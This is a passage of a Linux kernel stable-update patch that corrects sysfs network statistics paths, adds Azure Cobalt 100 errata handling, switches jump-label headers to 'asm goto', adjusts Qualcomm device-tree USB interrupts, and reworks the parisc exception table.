+ 		meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/tx_bytes
++What:		/sys/class/net/<iface>/statistics/tx_bytes
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -143,7 +143,7 @@ Description:
+ 		transmitted packets or all packets that have been queued for
+ 		transmission.
+ 
+-What:		/sys/class/<iface>/statistics/tx_carrier_errors
++What:		/sys/class/net/<iface>/statistics/tx_carrier_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -152,7 +152,7 @@ Description:
+ 		because of carrier errors (e.g: physical link down). See the
+ 		network driver for the exact meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/tx_compressed
++What:		/sys/class/net/<iface>/statistics/tx_compressed
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -161,7 +161,7 @@ Description:
+ 		this might only be relevant for devices that support
+ 		compression (e.g: PPP).
+ 
+-What:		/sys/class/<iface>/statistics/tx_dropped
++What:		/sys/class/net/<iface>/statistics/tx_dropped
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -170,7 +170,7 @@ Description:
+ 		See the driver for the exact reasons as to why the packets were
+ 		dropped.
+ 
+-What:		/sys/class/<iface>/statistics/tx_errors
++What:		/sys/class/net/<iface>/statistics/tx_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -179,7 +179,7 @@ Description:
+ 		a network device. See the driver for the exact reasons as to
+ 		why the packets were dropped.
+ 
+-What:		/sys/class/<iface>/statistics/tx_fifo_errors
++What:		/sys/class/net/<iface>/statistics/tx_fifo_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -188,7 +188,7 @@ Description:
+ 		FIFO error. See the driver for the exact reasons as to why the
+ 		packets were dropped.
+ 
+-What:		/sys/class/<iface>/statistics/tx_heartbeat_errors
++What:		/sys/class/net/<iface>/statistics/tx_heartbeat_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -197,7 +197,7 @@ Description:
+ 		reported as heartbeat errors. See the driver for the exact
+ 		reasons as to why the packets were dropped.
+ 
+-What:		/sys/class/<iface>/statistics/tx_packets
++What:		/sys/class/net/<iface>/statistics/tx_packets
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -206,7 +206,7 @@ Description:
+ 		device. See the driver for whether this reports the number of all
+ 		attempted or successful transmissions.
+ 
+-What:		/sys/class/<iface>/statistics/tx_window_errors
++What:		/sys/class/net/<iface>/statistics/tx_window_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index d9fce65b2f047..27135b9c07acb 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -221,3 +221,10 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | Fujitsu        | A64FX           | E#010001        | FUJITSU_ERRATUM_010001      |
+ +----------------+-----------------+-----------------+-----------------------------+
+++----------------+-----------------+-----------------+-----------------------------+
++| Microsoft      | Azure Cobalt 100| #2139208        | ARM64_ERRATUM_2139208       |
+++----------------+-----------------+-----------------+-----------------------------+
++| Microsoft      | Azure Cobalt 100| #2067961        | ARM64_ERRATUM_2067961       |
+++----------------+-----------------+-----------------+-----------------------------+
++| Microsoft      | Azure Cobalt 100| #2253138        | ARM64_ERRATUM_2253138       |
+++----------------+-----------------+-----------------+-----------------------------+
+diff --git a/Documentation/devicetree/bindings/net/wireless/marvell-8xxx.txt b/Documentation/devicetree/bindings/net/wireless/marvell-8xxx.txt
+index 9bf9bbac16e25..cdc303caf5f45 100644
+--- a/Documentation/devicetree/bindings/net/wireless/marvell-8xxx.txt
++++ b/Documentation/devicetree/bindings/net/wireless/marvell-8xxx.txt
+@@ -1,4 +1,4 @@
+-Marvell 8787/8897/8997 (sd8787/sd8897/sd8997/pcie8997) SDIO/PCIE devices
++Marvell 8787/8897/8978/8997 (sd8787/sd8897/sd8978/sd8997/pcie8997) SDIO/PCIE devices
+ ------
+ 
+ This node provides properties for controlling the Marvell SDIO/PCIE wireless device.
+@@ -10,7 +10,9 @@ Required properties:
+   - compatible : should be one of the following:
+ 	* "marvell,sd8787"
+ 	* "marvell,sd8897"
++	* "marvell,sd8978"
+ 	* "marvell,sd8997"
++	* "nxp,iw416"
+ 	* "pci11ab,2b42"
+ 	* "pci1b4b,2b42"
+ 
+diff --git a/Makefile b/Makefile
+index e93554269e474..d6bc9f597e8b8 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 78
++SUBLEVEL = 79
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+@@ -459,8 +459,7 @@ HOSTRUSTC = rustc
+ HOSTPKG_CONFIG	= pkg-config
+ 
+ KBUILD_USERHOSTCFLAGS := -Wall -Wmissing-prototypes -Wstrict-prototypes \
+-			 -O2 -fomit-frame-pointer -std=gnu11 \
+-			 -Wdeclaration-after-statement
++			 -O2 -fomit-frame-pointer -std=gnu11
+ KBUILD_USERCFLAGS  := $(KBUILD_USERHOSTCFLAGS) $(USERCFLAGS)
+ KBUILD_USERLDFLAGS := $(USERLDFLAGS)
+ 
+@@ -1018,9 +1017,6 @@ endif
+ # arch Makefile may override CC so keep this after arch Makefile is included
+ NOSTDINC_FLAGS += -nostdinc
+ 
+-# warn about C99 declaration after statement
+-KBUILD_CFLAGS += -Wdeclaration-after-statement
+-
+ # Variable Length Arrays (VLAs) should not be used anywhere in the kernel
+ KBUILD_CFLAGS += -Wvla
+ 
+diff --git a/arch/Kconfig b/arch/Kconfig
+index 14273a6203dfc..f99fd9a4ca778 100644
+--- a/arch/Kconfig
++++ b/arch/Kconfig
+@@ -642,6 +642,7 @@ config SHADOW_CALL_STACK
+ 	bool "Shadow Call Stack"
+ 	depends on ARCH_SUPPORTS_SHADOW_CALL_STACK
+ 	depends on DYNAMIC_FTRACE_WITH_ARGS || DYNAMIC_FTRACE_WITH_REGS || !FUNCTION_GRAPH_TRACER
++	depends on MMU
+ 	help
+ 	  This option enables the compiler's Shadow Call Stack, which
+ 	  uses a shadow stack to protect function return addresses from
+diff --git a/arch/arc/include/asm/jump_label.h b/arch/arc/include/asm/jump_label.h
+index 9d96180797396..a339223d9e052 100644
+--- a/arch/arc/include/asm/jump_label.h
++++ b/arch/arc/include/asm/jump_label.h
+@@ -31,7 +31,7 @@
+ static __always_inline bool arch_static_branch(struct static_key *key,
+ 					       bool branch)
+ {
+-	asm_volatile_goto(".balign "__stringify(JUMP_LABEL_NOP_SIZE)"	\n"
++	asm goto(".balign "__stringify(JUMP_LABEL_NOP_SIZE)"		\n"
+ 		 "1:							\n"
+ 		 "nop							\n"
+ 		 ".pushsection __jump_table, \"aw\"			\n"
+@@ -47,7 +47,7 @@ static __always_inline bool arch_static_branch(struct static_key *key,
+ static __always_inline bool arch_static_branch_jump(struct static_key *key,
+ 						    bool branch)
+ {
+-	asm_volatile_goto(".balign "__stringify(JUMP_LABEL_NOP_SIZE)"	\n"
++	asm goto(".balign "__stringify(JUMP_LABEL_NOP_SIZE)"		\n"
+ 		 "1:							\n"
+ 		 "b %l[l_yes]						\n"
+ 		 ".pushsection __jump_table, \"aw\"			\n"
+diff --git a/arch/arm/boot/dts/imx6q-apalis-ixora-v1.2.dts b/arch/arm/boot/dts/imx6q-apalis-ixora-v1.2.dts
+index f9f7d99bd4db8..76f3e07bc8826 100644
+--- a/arch/arm/boot/dts/imx6q-apalis-ixora-v1.2.dts
++++ b/arch/arm/boot/dts/imx6q-apalis-ixora-v1.2.dts
+@@ -76,6 +76,7 @@ reg_can1_supply: regulator-can1-supply {
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_enable_can1_power>;
+ 		regulator-name = "can1_supply";
++		startup-delay-us = <1000>;
+ 	};
+ 
+ 	reg_can2_supply: regulator-can2-supply {
+@@ -85,6 +86,7 @@ reg_can2_supply: regulator-can2-supply {
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_enable_can2_power>;
+ 		regulator-name = "can2_supply";
++		startup-delay-us = <1000>;
+ 	};
+ };
+ 
+diff --git a/arch/arm/include/asm/jump_label.h b/arch/arm/include/asm/jump_label.h
+index e12d7d096fc03..e4eb54f6cd9fe 100644
+--- a/arch/arm/include/asm/jump_label.h
++++ b/arch/arm/include/asm/jump_label.h
+@@ -11,7 +11,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 WASM(nop) "\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".word 1b, %l[l_yes], %c0\n\t"
+@@ -25,7 +25,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 WASM(b) " %l[l_yes]\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".word 1b, %l[l_yes], %c0\n\t"
+diff --git a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+index 9d116e1fbe10c..1ac4f8c24e231 100644
+--- a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
++++ b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+@@ -169,10 +169,6 @@ led@6 {
+ 	};
+ };
+ 
+-&blsp_dma {
+-	status = "okay";
+-};
+-
+ &blsp_i2c2 {
+ 	/* On Low speed expansion */
+ 	status = "okay";
+diff --git a/arch/arm64/boot/dts/qcom/msm8916.dtsi b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+index bafac2cf7e3d6..987cebbda0571 100644
+--- a/arch/arm64/boot/dts/qcom/msm8916.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+@@ -1522,7 +1522,7 @@ blsp_dma: dma-controller@7884000 {
+ 			clock-names = "bam_clk";
+ 			#dma-cells = <1>;
+ 			qcom,ee = <0>;
+-			status = "disabled";
++			qcom,controlled-remotely;
+ 		};
+ 
+ 		blsp1_uart1: serial@78af000 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index 4d5905ef0b411..95c515da9f2e0 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -4049,7 +4049,7 @@ usb_1: usb@a6f8800 {
+ 			assigned-clock-rates = <19200000>, <150000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&intc GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc_intc 6 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&pdc_intc 8 IRQ_TYPE_EDGE_BOTH>,
+ 					      <&pdc_intc 9 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+@@ -4100,7 +4100,7 @@ usb_2: usb@a8f8800 {
+ 			assigned-clock-rates = <19200000>, <150000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&intc GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc_intc 7 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&pdc_intc 10 IRQ_TYPE_EDGE_BOTH>,
+ 					      <&pdc_intc 11 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index 8efd0e227d780..eb1a9369926d2 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -3629,7 +3629,7 @@ usb_1: usb@a6f8800 {
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&intc GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 6 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&pdc 8 IRQ_TYPE_EDGE_BOTH>,
+ 					      <&pdc 9 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+@@ -3678,7 +3678,7 @@ usb_2: usb@a8f8800 {
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&intc GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 7 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&pdc 10 IRQ_TYPE_EDGE_BOTH>,
+ 					      <&pdc 11 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+diff --git a/arch/arm64/include/asm/alternative-macros.h b/arch/arm64/include/asm/alternative-macros.h
+index 3622e9f4fb442..51738c56e96cd 100644
+--- a/arch/arm64/include/asm/alternative-macros.h
++++ b/arch/arm64/include/asm/alternative-macros.h
+@@ -229,7 +229,7 @@ alternative_has_feature_likely(unsigned long feature)
+ 	compiletime_assert(feature < ARM64_NCAPS,
+ 			   "feature must be < ARM64_NCAPS");
+ 
+-	asm_volatile_goto(
++	asm goto(
+ 	ALTERNATIVE_CB("b	%l[l_no]", %[feature], alt_cb_patch_nops)
+ 	:
+ 	: [feature] "i" (feature)
+@@ -247,7 +247,7 @@ alternative_has_feature_unlikely(unsigned long feature)
+ 	compiletime_assert(feature < ARM64_NCAPS,
+ 			   "feature must be < ARM64_NCAPS");
+ 
+-	asm_volatile_goto(
++	asm goto(
+ 	ALTERNATIVE("nop", "b	%l[l_yes]", %[feature])
+ 	:
+ 	: [feature] "i" (feature)
+diff --git a/arch/arm64/include/asm/cputype.h b/arch/arm64/include/asm/cputype.h
+index 7dce9c0aa7836..af3a678a76b3a 100644
+--- a/arch/arm64/include/asm/cputype.h
++++ b/arch/arm64/include/asm/cputype.h
+@@ -61,6 +61,7 @@
+ #define ARM_CPU_IMP_HISI		0x48
+ #define ARM_CPU_IMP_APPLE		0x61
+ #define ARM_CPU_IMP_AMPERE		0xC0
++#define ARM_CPU_IMP_MICROSOFT		0x6D
+ 
+ #define ARM_CPU_PART_AEM_V8		0xD0F
+ #define ARM_CPU_PART_FOUNDATION		0xD00
+@@ -128,6 +129,8 @@
+ 
+ #define AMPERE_CPU_PART_AMPERE1		0xAC3
+ 
++#define MICROSOFT_CPU_PART_AZURE_COBALT_100	0xD49 /* Based on r0p0 of ARM Neoverse N2 */
++
+ #define MIDR_CORTEX_A53 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A53)
+ #define MIDR_CORTEX_A57 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A57)
+ #define MIDR_CORTEX_A72 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A72)
+@@ -179,6 +182,7 @@
+ #define MIDR_APPLE_M1_ICESTORM_MAX MIDR_CPU_MODEL(ARM_CPU_IMP_APPLE, APPLE_CPU_PART_M1_ICESTORM_MAX)
+ #define MIDR_APPLE_M1_FIRESTORM_MAX MIDR_CPU_MODEL(ARM_CPU_IMP_APPLE, APPLE_CPU_PART_M1_FIRESTORM_MAX)
+ #define MIDR_AMPERE1 MIDR_CPU_MODEL(ARM_CPU_IMP_AMPERE, AMPERE_CPU_PART_AMPERE1)
++#define MIDR_MICROSOFT_AZURE_COBALT_100 MIDR_CPU_MODEL(ARM_CPU_IMP_MICROSOFT, MICROSOFT_CPU_PART_AZURE_COBALT_100)
+ 
+ /* Fujitsu Erratum 010001 affects A64FX 1.0 and 1.1, (v0r0 and v1r0) */
+ #define MIDR_FUJITSU_ERRATUM_010001		MIDR_FUJITSU_A64FX
+diff --git a/arch/arm64/include/asm/jump_label.h b/arch/arm64/include/asm/jump_label.h
+index cea441b6aa5dc..b5bd3c38a01b2 100644
+--- a/arch/arm64/include/asm/jump_label.h
++++ b/arch/arm64/include/asm/jump_label.h
+@@ -18,7 +18,7 @@
+ static __always_inline bool arch_static_branch(struct static_key *key,
+ 					       bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"1:	nop					\n\t"
+ 		 "	.pushsection	__jump_table, \"aw\"	\n\t"
+ 		 "	.align		3			\n\t"
+@@ -35,7 +35,7 @@ static __always_inline bool arch_static_branch(struct static_key *key,
+ static __always_inline bool arch_static_branch_jump(struct static_key *key,
+ 						    bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"1:	b		%l[l_yes]		\n\t"
+ 		 "	.pushsection	__jump_table, \"aw\"	\n\t"
+ 		 "	.align		3			\n\t"
+diff --git a/arch/arm64/kernel/cpu_errata.c b/arch/arm64/kernel/cpu_errata.c
+index 61f22e9c92b4c..74584597bfb82 100644
+--- a/arch/arm64/kernel/cpu_errata.c
++++ b/arch/arm64/kernel/cpu_errata.c
+@@ -390,6 +390,7 @@ static const struct midr_range erratum_1463225[] = {
+ static const struct midr_range trbe_overwrite_fill_mode_cpus[] = {
+ #ifdef CONFIG_ARM64_ERRATUM_2139208
+ 	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_N2),
++	MIDR_ALL_VERSIONS(MIDR_MICROSOFT_AZURE_COBALT_100),
+ #endif
+ #ifdef CONFIG_ARM64_ERRATUM_2119858
+ 	MIDR_ALL_VERSIONS(MIDR_CORTEX_A710),
+@@ -403,6 +404,7 @@ static const struct midr_range trbe_overwrite_fill_mode_cpus[] = {
+ static const struct midr_range tsb_flush_fail_cpus[] = {
+ #ifdef CONFIG_ARM64_ERRATUM_2067961
+ 	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_N2),
++	MIDR_ALL_VERSIONS(MIDR_MICROSOFT_AZURE_COBALT_100),
+ #endif
+ #ifdef CONFIG_ARM64_ERRATUM_2054223
+ 	MIDR_ALL_VERSIONS(MIDR_CORTEX_A710),
+@@ -415,6 +417,7 @@ static const struct midr_range tsb_flush_fail_cpus[] = {
+ static struct midr_range trbe_write_out_of_range_cpus[] = {
+ #ifdef CONFIG_ARM64_ERRATUM_2253138
+ 	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_N2),
++	MIDR_ALL_VERSIONS(MIDR_MICROSOFT_AZURE_COBALT_100),
+ #endif
+ #ifdef CONFIG_ARM64_ERRATUM_2224489
+ 	MIDR_ALL_VERSIONS(MIDR_CORTEX_A710),
+diff --git a/arch/arm64/kernel/vdso32/Makefile b/arch/arm64/kernel/vdso32/Makefile
+index 36c8f66cad251..d513533cc922f 100644
+--- a/arch/arm64/kernel/vdso32/Makefile
++++ b/arch/arm64/kernel/vdso32/Makefile
+@@ -68,11 +68,9 @@ VDSO_CFLAGS += -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+                -fno-strict-aliasing -fno-common \
+                -Werror-implicit-function-declaration \
+                -Wno-format-security \
+-               -Wdeclaration-after-statement \
+                -std=gnu11
+ VDSO_CFLAGS  += -O2
+ # Some useful compiler-dependent flags from top-level Makefile
+-VDSO_CFLAGS += $(call cc32-option,-Wdeclaration-after-statement,)
+ VDSO_CFLAGS += $(call cc32-option,-Wno-pointer-sign)
+ VDSO_CFLAGS += -fno-strict-overflow
+ VDSO_CFLAGS += $(call cc32-option,-Werror=strict-prototypes)
+diff --git a/arch/csky/include/asm/jump_label.h b/arch/csky/include/asm/jump_label.h
+index 98a3f4b168bd2..ef2e37a10a0fe 100644
+--- a/arch/csky/include/asm/jump_label.h
++++ b/arch/csky/include/asm/jump_label.h
+@@ -12,7 +12,7 @@
+ static __always_inline bool arch_static_branch(struct static_key *key,
+ 					       bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"1:	nop32					\n"
+ 		"	.pushsection	__jump_table, \"aw\"	\n"
+ 		"	.align		2			\n"
+@@ -29,7 +29,7 @@ static __always_inline bool arch_static_branch(struct static_key *key,
+ static __always_inline bool arch_static_branch_jump(struct static_key *key,
+ 						    bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"1:	bsr32		%l[label]		\n"
+ 		"	.pushsection	__jump_table, \"aw\"	\n"
+ 		"	.align		2			\n"
+diff --git a/arch/mips/include/asm/checksum.h b/arch/mips/include/asm/checksum.h
+index 4044eaf989ac7..0921ddda11a4b 100644
+--- a/arch/mips/include/asm/checksum.h
++++ b/arch/mips/include/asm/checksum.h
+@@ -241,7 +241,8 @@ static __inline__ __sum16 csum_ipv6_magic(const struct in6_addr *saddr,
+ 	"	.set	pop"
+ 	: "=&r" (sum), "=&r" (tmp)
+ 	: "r" (saddr), "r" (daddr),
+-	  "0" (htonl(len)), "r" (htonl(proto)), "r" (sum));
++	  "0" (htonl(len)), "r" (htonl(proto)), "r" (sum)
++	: "memory");
+ 
+ 	return csum_fold(sum);
+ }
+diff --git a/arch/mips/include/asm/jump_label.h b/arch/mips/include/asm/jump_label.h
+index c5c6864e64bc4..405c85173f2c1 100644
+--- a/arch/mips/include/asm/jump_label.h
++++ b/arch/mips/include/asm/jump_label.h
+@@ -36,7 +36,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\t" B_INSN " 2f\n\t"
++	asm goto("1:\t" B_INSN " 2f\n\t"
+ 		"2:\t.insn\n\t"
+ 		".pushsection __jump_table,  \"aw\"\n\t"
+ 		WORD_INSN " 1b, %l[l_yes], %0\n\t"
+@@ -50,7 +50,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\t" J_INSN " %l[l_yes]\n\t"
++	asm goto("1:\t" J_INSN " %l[l_yes]\n\t"
+ 		".pushsection __jump_table,  \"aw\"\n\t"
+ 		WORD_INSN " 1b, %l[l_yes], %0\n\t"
+ 		".popsection\n\t"
+diff --git a/arch/parisc/Kconfig b/arch/parisc/Kconfig
+index 345d5e021484c..abf39ecda6fb1 100644
+--- a/arch/parisc/Kconfig
++++ b/arch/parisc/Kconfig
+@@ -24,7 +24,6 @@ config PARISC
+ 	select RTC_DRV_GENERIC
+ 	select INIT_ALL_POSSIBLE
+ 	select BUG
+-	select BUILDTIME_TABLE_SORT
+ 	select HAVE_PCI
+ 	select HAVE_PERF_EVENTS
+ 	select HAVE_KERNEL_BZIP2
+diff --git a/arch/parisc/include/asm/assembly.h b/arch/parisc/include/asm/assembly.h
+index 74d17d7e759da..5937d5edaba1e 100644
+--- a/arch/parisc/include/asm/assembly.h
++++ b/arch/parisc/include/asm/assembly.h
+@@ -576,6 +576,7 @@
+ 	.section __ex_table,"aw"			!	\
+ 	.align 4					!	\
+ 	.word (fault_addr - .), (except_addr - .)	!	\
++	or %r0,%r0,%r0					!	\
+ 	.previous
+ 
+ 
+diff --git a/arch/parisc/include/asm/extable.h b/arch/parisc/include/asm/extable.h
+new file mode 100644
+index 0000000000000..4ea23e3d79dc9
+--- /dev/null
++++ b/arch/parisc/include/asm/extable.h
+@@ -0,0 +1,64 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef __PARISC_EXTABLE_H
++#define __PARISC_EXTABLE_H
++
++#include <asm/ptrace.h>
++#include <linux/compiler.h>
++
++/*
++ * The exception table consists of three addresses:
++ *
++ * - A relative address to the instruction that is allowed to fault.
++ * - A relative address at which the program should continue (fixup routine)
++ * - An asm statement which specifies which CPU register will
++ *   receive -EFAULT when an exception happens if the lowest bit in
++ *   the fixup address is set.
++ *
++ * Note: The register specified in the err_opcode instruction will be
++ * modified at runtime if a fault happens. Register %r0 will be ignored.
++ *
++ * Since relative addresses are used, 32bit values are sufficient even on
++ * 64bit kernel.
++ */
++
++struct pt_regs;
++int fixup_exception(struct pt_regs *regs);
++
++#define ARCH_HAS_RELATIVE_EXTABLE
++struct exception_table_entry {
++	int insn;	/* relative address of insn that is allowed to fault. */
++	int fixup;	/* relative address of fixup routine */
++	int err_opcode; /* sample opcode with register which holds error code */
++};
++
++#define ASM_EXCEPTIONTABLE_ENTRY( fault_addr, except_addr, opcode )\
++	".section __ex_table,\"aw\"\n"			   \
++	".align 4\n"					   \
++	".word (" #fault_addr " - .), (" #except_addr " - .)\n" \
++	opcode "\n"					   \
++	".previous\n"
++
++/*
++ * ASM_EXCEPTIONTABLE_ENTRY_EFAULT() creates a special exception table entry
++ * (with lowest bit set) for which the fault handler in fixup_exception() will
++ * load -EFAULT on fault into the register specified by the err_opcode instruction,
++ * and zeroes the target register in case of a read fault in get_user().
++ */
++#define ASM_EXCEPTIONTABLE_VAR(__err_var)		\
++	int __err_var = 0
++#define ASM_EXCEPTIONTABLE_ENTRY_EFAULT( fault_addr, except_addr, register )\
++	ASM_EXCEPTIONTABLE_ENTRY( fault_addr, except_addr + 1, "or %%r0,%%r0," register)
++
++static inline void swap_ex_entry_fixup(struct exception_table_entry *a,
++				       struct exception_table_entry *b,
++				       struct exception_table_entry tmp,
++				       int delta)
++{
++	a->fixup = b->fixup + delta;
++	b->fixup = tmp.fixup - delta;
++	a->err_opcode = b->err_opcode;
++	b->err_opcode = tmp.err_opcode;
++}
++#define swap_ex_entry_fixup swap_ex_entry_fixup
++
++#endif
+diff --git a/arch/parisc/include/asm/jump_label.h b/arch/parisc/include/asm/jump_label.h
+index 94428798b6aa6..317ebc5edc9fe 100644
+--- a/arch/parisc/include/asm/jump_label.h
++++ b/arch/parisc/include/asm/jump_label.h
+@@ -12,7 +12,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "nop\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".align %1\n\t"
+@@ -29,7 +29,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "b,n %l[l_yes]\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".align %1\n\t"
+diff --git a/arch/parisc/include/asm/special_insns.h b/arch/parisc/include/asm/special_insns.h
+index c822bd0c0e3c6..51f40eaf77806 100644
+--- a/arch/parisc/include/asm/special_insns.h
++++ b/arch/parisc/include/asm/special_insns.h
+@@ -8,7 +8,8 @@
+ 		"copy %%r0,%0\n"			\
+ 		"8:\tlpa %%r0(%1),%0\n"			\
+ 		"9:\n"					\
+-		ASM_EXCEPTIONTABLE_ENTRY(8b, 9b)	\
++		ASM_EXCEPTIONTABLE_ENTRY(8b, 9b,	\
++				"or %%r0,%%r0,%%r0")	\
+ 		: "=&r" (pa)				\
+ 		: "r" (va)				\
+ 		: "memory"				\
+@@ -22,7 +23,8 @@
+ 		"copy %%r0,%0\n"			\
+ 		"8:\tlpa %%r0(%%sr3,%1),%0\n"		\
+ 		"9:\n"					\
+-		ASM_EXCEPTIONTABLE_ENTRY(8b, 9b)	\
++		ASM_EXCEPTIONTABLE_ENTRY(8b, 9b,	\
++				"or %%r0,%%r0,%%r0")	\
+ 		: "=&r" (pa)				\
+ 		: "r" (va)				\
+ 		: "memory"				\
+diff --git a/arch/parisc/include/asm/uaccess.h b/arch/parisc/include/asm/uaccess.h
+index 4165079898d9e..88d0ae5769dde 100644
+--- a/arch/parisc/include/asm/uaccess.h
++++ b/arch/parisc/include/asm/uaccess.h
+@@ -7,6 +7,7 @@
+  */
+ #include <asm/page.h>
+ #include <asm/cache.h>
++#include <asm/extable.h>
+ 
+ #include <linux/bug.h>
+ #include <linux/string.h>
+@@ -26,37 +27,6 @@
+ #define STD_USER(sr, x, ptr)	__put_user_asm(sr, "std", x, ptr)
+ #endif
+ 
+-/*
+- * The exception table contains two values: the first is the relative offset to
+- * the address of the instruction that is allowed to fault, and the second is
+- * the relative offset to the address of the fixup routine. Since relative
+- * addresses are used, 32bit values are sufficient even on 64bit kernel.
+- */
+-
+-#define ARCH_HAS_RELATIVE_EXTABLE
+-struct exception_table_entry {
+-	int insn;	/* relative address of insn that is allowed to fault. */
+-	int fixup;	/* relative address of fixup routine */
+-};
+-
+-#define ASM_EXCEPTIONTABLE_ENTRY( fault_addr, except_addr )\
+-	".section __ex_table,\"aw\"\n"			   \
+-	".align 4\n"					   \
+-	".word (" #fault_addr " - .), (" #except_addr " - .)\n\t" \
+-	".previous\n"
+-
+-/*
+- * ASM_EXCEPTIONTABLE_ENTRY_EFAULT() creates a special exception table entry
+- * (with lowest bit set) for which the fault handler in fixup_exception() will
+- * load -EFAULT into %r29 for a read or write fault, and zeroes the target
+- * register in case of a read fault in get_user().
+- */
+-#define ASM_EXCEPTIONTABLE_REG	29
